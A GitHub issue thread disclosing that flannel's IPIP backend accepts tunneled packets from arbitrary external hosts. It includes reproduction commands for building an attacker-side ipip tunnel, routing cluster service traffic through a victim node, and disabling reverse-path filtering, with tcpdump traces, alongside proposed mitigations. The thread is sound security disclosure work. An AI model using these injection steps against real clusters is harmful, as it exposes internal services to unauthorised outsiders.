flannel-io / flannel

flannel is a network fabric for containers, designed for Kubernetes
Apache License 2.0

When using externally routable node IPs, the IPIP backend accepts tunneled packets from arbitrary remote hosts, which potentially exposes internal cluster services to external attackers in the absence of reverse-path filtering #961

Closed. SpComb closed this issue 1 year ago.

SpComb commented 6 years ago

The flannel ipip backend creates a single ipip tunnel device with remote any:

9: flannel.ipip@NONE: <NOARP,UP,LOWER_UP> mtu 1480 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/ipip 192.0.2.1 0.0.0.0 promiscuity 0 
    ipip remote any local 192.0.2.1 ttl inherit nopmtudisc addrgenmode eui64 

This tunnel device will accept, de-encapsulate and forward any IPIP packets arriving with the correct destination address, regardless of the source address. Given a cluster with nodes using externally routable node IPs, there is nothing to prevent arbitrary external hosts that do not belong to the cluster from sending arbitrary encapsulated packets to any of the cluster hosts.

This is a security issue that risks exposing internal pods/services within the cluster to untrusted external attackers. An external attacker with knowledge of the internal IP addresses in use on the cluster can use this configuration to inject packets using spoofed cluster-internal IPs into the cluster. In configurations lacking reverse-path filtering (RPF) at the host/network level, the external attacker could also use a routable source address to establish TCP connections to services within the cluster.

The default vxlan backend has a related issue in that it accepts packets on UDP port 8472 from arbitrary sources. It is partly mitigated by requiring the attacker to know the flannel.1 VXLAN interface's (randomly-generated?) 48-bit MAC address in order to inject unicast packets; however, injected VXLAN packets with a broadcast destination address may still get processed in some cases (ICMP ping?).
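For reference, the 48-bit MAC address the attacker would need for unicast VXLAN injection is the one on the flannel.1 device, which can be inspected on a node with ip -d link (illustrative output with a placeholder MAC; exact fields vary by kernel and deployment):

$ ip -d link show flannel.1
5: flannel.1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/ether aa:bb:cc:dd:ee:ff brd ff:ff:ff:ff:ff:ff promiscuity 0 
    vxlan id 1 local 192.0.2.1 dev bond0 srcport 0 0 dstport 8472 nolearning ...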

EDIT: edited the title to clarify that only clusters using externally routable node IPs are affected. Clusters using internal node IPs would only accept IPIP packets with a destination address matching the internal node IPs. IPIP packets to any other externally routable local IPs on the same node should get rejected by the kernel.

Expected Behavior

Flannel nodes should only accept ip-ip packets from source addresses belonging to other nodes in the same cluster.

This would raise the bar: to inject packets, an attacker would need to be able to spoof the external node source addresses, and to establish connections they would additionally have to actively hijack routing.
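As an illustration of what that could look like at the interface level (a hand-rolled sketch using this issue's example addresses and made-up interface names, not something flannel does today), node1 could get one point-to-point tunnel per peer and leave tunl0 down, so that IPIP packets from any other source have no matching tunnel and are rejected by the kernel:

$ ip link add ipip-master type ipip local 192.0.2.1 remote 192.0.2.0
$ ip link add ipip-node2 type ipip local 192.0.2.1 remote 192.0.2.2
$ ip link set ipip-master up
$ ip link set ipip-node2 up
$ ip route add 10.32.0.0/24 dev ipip-master
$ ip route add 10.32.1.0/24 dev ipip-node2

This is essentially the kube-router approach shown in the comment below.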

Current Behavior

Flannel nodes accept incoming ip-ip packets from arbitrary source addresses to the local nodeIP, and tunneled packets containing spoofed cluster pod/svc IPs will be forwarded to the internal containers.

Possible Solutions

Create separate ipip interfaces bound to specific sources and leave the default tunl0 interface down?

Create and manage iptables rules to whitelist incoming IP-IP packet sources (see the sketch after this list)?

Document the security requirement for limiting external IP-IP traffic to nodes (i.e. only use private/internal/non-globally-routable kubelet --node-ip addresses)?
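As a rough sketch of the iptables option (not an existing flannel feature, using this issue's example node addresses; flannel would have to keep the whitelist in sync as nodes join and leave), node1 could restrict incoming IP protocol 4 (IP-in-IP) to the known peers:

$ iptables -N FLANNEL-IPIP
$ iptables -A FLANNEL-IPIP -s 192.0.2.0/32 -j ACCEPT
$ iptables -A FLANNEL-IPIP -s 192.0.2.2/32 -j ACCEPT
$ iptables -A FLANNEL-IPIP -j DROP
$ iptables -I INPUT -p 4 -j FLANNEL-IPIP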

Steps to Reproduce (for bugs)

Given a node in a kubernetes cluster deployed using networking.podSubnet: 10.32.0.0/16 + networking.serviceSubnet: 10.96.0.0/16, and with flannel deployed using a net-conf.json of { "Network": "10.32.0.0/12", "Backend": { "Type": "ipip" } }:

The node at 192.0.2.1 will have the following relevant parts in its network configuration, with the master node at 192.0.2.0, and a second node at 192.0.2.2:

$ ip addr
4: bond0: <BROADCAST,MULTICAST,MASTER,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 0c:c4:7a:54:0b:e2 brd ff:ff:ff:ff:ff:ff promiscuity 0 
    bond mode balance-tlb ...
    inet 192.0.2.1/31 brd 255.255.255.255 scope global bond0
       valid_lft forever preferred_lft forever
6: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1
    link/ipip 0.0.0.0 brd 0.0.0.0 promiscuity 0 
    ipip remote any local any ttl inherit nopmtudisc 
7: flannel.ipip@NONE: <NOARP,UP,LOWER_UP> mtu 1480 qdisc noqueue state UNKNOWN group default 
    link/ipip 192.0.2.1 brd 0.0.0.0 promiscuity 0 
    ipip remote any local 192.0.2.1 ttl inherit nopmtudisc 
    inet 10.32.2.0/32 scope global flannel.ipip
       valid_lft forever preferred_lft forever
8: cni0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1480 qdisc noqueue state UP group default qlen 1000
    link/ether 0a:58:0a:20:02:01 brd ff:ff:ff:ff:ff:ff promiscuity 0 
    bridge forward_delay 1500 hello_time 200 max_age 2000 ageing_time 30000 stp_state 0 priority 32768 vlan_filtering 0 vlan_protocol 802.1Q 
    inet 10.32.2.1/24 scope global cni0
       valid_lft forever preferred_lft forever
    inet6 fe80::dc57:4fff:fec2:8826/64 scope link 
       valid_lft forever preferred_lft forever
$ ip ro
default via ... dev bond0 onlink 
10.32.0.0/24 via 192.0.2.0 dev flannel.ipip onlink 
10.32.1.0/24 via 192.0.2.2 dev flannel.ipip onlink 
10.32.2.0/24 dev cni0  proto kernel  scope link  src 10.32.2.1 

Default case with RPF enabled, using a spoofed cluster-internal source IP

An external attacker at any arbitrary external host (x.y.z.w) with knowledge of:

- the victim node's externally routable IP (192.0.2.1)
- the pod subnet allocated to some other node in the cluster (here node2's 10.32.1.0/24)
- the cluster service CIDR (10.96.0.0/16)

can then do the following:

$ ip link add ipip-test type ipip local x.y.z.w remote any
$ ip addr add 10.32.1.0 dev ipip-test
$ ip link set ipip-test up
$ sudo ip ro add 10.96.0.0/16 via 192.0.2.1 dev ipip-test onlink
$ ip ro get 10.96.0.10
10.96.0.10 via 192.0.2.1 dev ipip-test  src 10.32.1.0 
    cache 
$ dig @10.96.0.10 kubernetes.default.svc.cluster.local

; <<>> DiG 9.10.3-P4-Ubuntu <<>> @10.96.0.10 kubernetes.default.svc.cluster.local
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached

Looking at the tcpdump traces on the external network interfaces across the nodes, the DNS query from the external host to the internal DNS service gets injected into the cluster. In this case, the DNS pod is running on the master node, so the reply goes to the spoofed second node, which returns an ICMP unreachable for the unrecognized UDP response packet.

Attacker node (x.y.z.w)

13:57:04.014935 IP x.y.z.w > 192.0.2.1: IP 10.32.1.0.54886 > 10.96.0.10.53: 64475+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)

node1 (192.0.2.1)

13:57:04.089296 x.y.z.w > 192.0.2.1: 10.32.1.0.54886 > 10.96.0.10.53: 64475+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)
13:57:04.089387 192.0.2.1 > 192.0.2.0: 10.32.1.0.54886 > 10.32.0.6.53: 64475+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)

master (192.0.2.0)

13:57:04.086583 192.0.2.1 > 192.0.2.0: 10.32.1.0.54886 > 10.32.0.6.53: 64475+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)
13:57:04.087237 192.0.2.0 > 192.0.2.2: 10.32.0.6.53 > 10.32.1.0.54886: 64475* 1/0/0 A 10.96.0.1 (70) (ipip-proto-4)
13:57:04.087425 192.0.2.2 > 192.0.2.0: 10.32.1.0 > 10.32.0.6: ICMP 10.32.1.0 udp port 54886 unreachable, length 106 (ipip-proto-4)

node2 (192.0.2.2)

13:57:04.087746 192.0.2.0 > 192.0.2.2: 10.32.0.6.53 > 10.32.1.0.54886: 64475* 1/0/0 A 10.96.0.1 (70) (ipip-proto-4)
13:57:04.087833 192.0.2.2 > 192.0.2.0: 10.32.1.0 > 10.32.0.6: ICMP 10.32.1.0 udp port 54886 unreachable, length 106 (ipip-proto-4)

Advanced case with RPF disabled

The default case requires spoofing a valid source address within the cluster due to RPF being enabled on the victim node. However, with RPF disabled on the victim node:

$ sysctl net.ipv4.conf.all.rp_filter=0
$ sysctl net.ipv4.conf.flannel/ipip.rp_filter=0

we can get very close to not just injecting spoofed packets into the cluster, but actually connecting to internal cluster services. In this case, the attacker no longer needs any knowledge of the pod CIDRs allocated to the specific nodes:

$ ip link add ipip-test type ipip local x.y.z.w remote any
$ ip link set ipip-test up
$ ip ro add 10.96.0.0/16 via 192.0.2.1 dev ipip-test onlink
$ ip ro get 10.96.0.10
10.96.0.10 via 192.0.2.1 dev ipip-test  src x.y.z.w 
    cache 
$ dig @10.96.0.10 kubernetes.default.svc.cluster.local

; <<>> DiG 9.10.3-P4-Ubuntu <<>> @10.96.0.10 kubernetes.default.svc.cluster.local
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached

Looking at the tcpdump on the victim node, the incoming packet is accepted and forwarded to the DNS pod, and the response packet is actually sent back to the attacking node using the cluster-internal 10.96.0.10 source IP:

14:08:57.147777 x.y.z.w > 192.0.2.1: x.y.z.w.57843 > 10.96.0.10.53: 35763+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)
14:08:57.147881 192.0.2.1 > 192.0.2.0: 10.32.2.0.57843 > 10.32.0.6.53: 35763+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)
14:08:57.148647 192.0.2.0 > 192.0.2.1: 10.32.0.6.53 > 10.32.2.0.57843: 35763* 1/0/0 A 10.96.0.1 (70) (ipip-proto-4)
14:08:57.148700 10.96.0.10.53 > x.y.z.w.57843: 35763* 1/0/0 A 10.96.0.1 (70)

In this case, the upstream router drops the reply, which carries the cluster-internal source address, per its own RPF rules before it reaches the attacking node. However, in some network topologies without any RPF filtering between the attacker and the victim, the external attacker may actually be able to connect to arbitrary internal cluster services, including the default 10.96.0.10 DNS service, and thereby resolve the service clusterIP addresses.

Context

Nodes connected to the same raw ethernet network are naturally also exposed to similar access from an attacker directly connected to the same ethernet network, but typical cloud provider networks will filter out any traffic using cluster-internal source/destination IP addresses between the cluster nodes and the untrusted attacker node. However, such filtering typically does not see the cluster-internal addresses carried inside IP-IP tunneled packets.

Your Environment

SpComb commented 6 years ago

For comparison, kube-router configures separate point-to-point IPIP tunnel interfaces, so it's not affected by this.

7: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN mode DEFAULT group default qlen 1
    link/ipip 0.0.0.0 brd 0.0.0.0 promiscuity 0 
    ipip remote any local any ttl inherit nopmtudisc 
8: tun-aaaaaaa@bond0: <POINTOPOINT,NOARP,UP,LOWER_UP> mtu 1460 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/ipip 192.0.2.2 peer 192.0.2.1 promiscuity 0 
    ipip remote 192.0.2.1 local 192.0.2.2 dev bond0 ttl inherit pmtudisc addrgenmode eui64 
9: tun-bbbbbbb@bond0: <POINTOPOINT,NOARP,UP,LOWER_UP> mtu 1460 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/ipip 192.0.2.2 peer 192.0.2.0 promiscuity 0 
    ipip remote 192.0.2.0 local 192.0.2.2 dev bond0 ttl inherit pmtudisc addrgenmode eui64 

With the tunl0 interface being down, the incoming IP-IP packets from unconfigured sources get rejected by the kernel with ICMP unreachable:

15:18:11.214722 x.y.z.w > 192.0.2.2: x.y.z.w.52126 > 10.96.0.10.53: 5619+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)
15:18:11.214829 192.0.2.2 > x.y.z.w: ICMP 192.0.2.2 protocol 4 port 93 unreachable, length 121

If you bring the tunl0 interface up and disable RPF on it, then it does accept the injected traffic.
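That corresponds roughly to running the following on the node (a sketch; note that the effective rp_filter value is the maximum of the all and per-interface settings, so net.ipv4.conf.all.rp_filter may also need to be 0):

$ ip link set tunl0 up
$ sysctl net.ipv4.conf.tunl0.rp_filter=0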

stale[bot] commented 1 year ago

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.